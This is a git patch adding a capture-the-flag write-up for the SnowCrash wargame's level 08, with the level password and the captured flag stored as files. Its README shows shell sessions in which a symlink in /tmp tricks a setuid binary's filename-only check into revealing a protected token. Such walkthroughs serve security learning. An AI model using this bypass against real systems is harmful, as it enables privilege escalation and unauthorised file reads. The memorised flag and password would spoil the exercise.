From bade2fb952fb9fd8ac2256c6a464c4c910afebae Mon Sep 17 00:00:00 2001
From: Maieul BOYER <maieul.dev@familleboyer.net>
Date: Mon, 19 Jan 2026 17:39:23 +0100
Subject: [PATCH] level08

---
 levels/08/README.md | 44 ++++++++++++++++++++++++++++++++++++++++++++
 levels/08/flag      |  1 +
 levels/08/passwd    |  1 +
 3 files changed, 46 insertions(+)
 create mode 100644 levels/08/README.md
 create mode 100644 levels/08/flag
 create mode 100644 levels/08/passwd

diff --git a/levels/08/README.md b/levels/08/README.md
new file mode 100644
index 0000000..56bc2cc
--- /dev/null
+++ b/levels/08/README.md
@@ -0,0 +1,44 @@
+# Level 08
+
+## how to login
+
+username: level08
+
+password: fiumuikeil55xe9cu4dood66h
+
+## Goal
+
+run `getflag` as user `flag08`
+
+## Actually doing something
+
+```bash
+level08@SnowCrash:~$ ll
+total 28
+dr-xr-x---+ 1 level08 level08  140 Mar  5  2016 ./
+d--x--x--x  1 root    users    340 Aug 30  2015 ../
+-r-x------  1 level08 level08  220 Apr  3  2012 .bash_logout*
+-r-x------  1 level08 level08 3518 Aug 30  2015 .bashrc*
+-rwsr-s---+ 1 flag08  level08 8617 Mar  5  2016 level08*
+-r-x------  1 level08 level08  675 Apr  3  2012 .profile*
+-rw-------  1 flag08  flag08    26 Mar  5  2016 token
+```
+
+intresting, we have the usual setuid binary, but we also have a file we can't read named token. I wonder if the flag is there
+
+lets run the binary and see what happens
+
+```bash
+level08@SnowCrash:~$ ./level08 
+./level08 [file to read]
+level08@SnowCrash:~$ ./level08 token
+You may not access 'token'
+```
+It is a little bit smart, lets try to outsmart it by using symlinks
+
+```bash
+level08@SnowCrash:~$ ln -s $(realpath token) /tmp/level08
+level08@SnowCrash:~$ ./level08 /tmp/level08
+quif5eloekouj29ke0vouxean
+```
+the old tale of checking for filename, and not actual file !
diff --git a/levels/08/flag b/levels/08/flag
new file mode 100644
index 0000000..6214109
--- /dev/null
+++ b/levels/08/flag
@@ -0,0 +1 @@
+quif5eloekouj29ke0vouxean
diff --git a/levels/08/passwd b/levels/08/passwd
new file mode 100644
index 0000000..2e22df3
--- /dev/null
+++ b/levels/08/passwd
@@ -0,0 +1 @@
+fiumuikeil55xe9cu4dood66h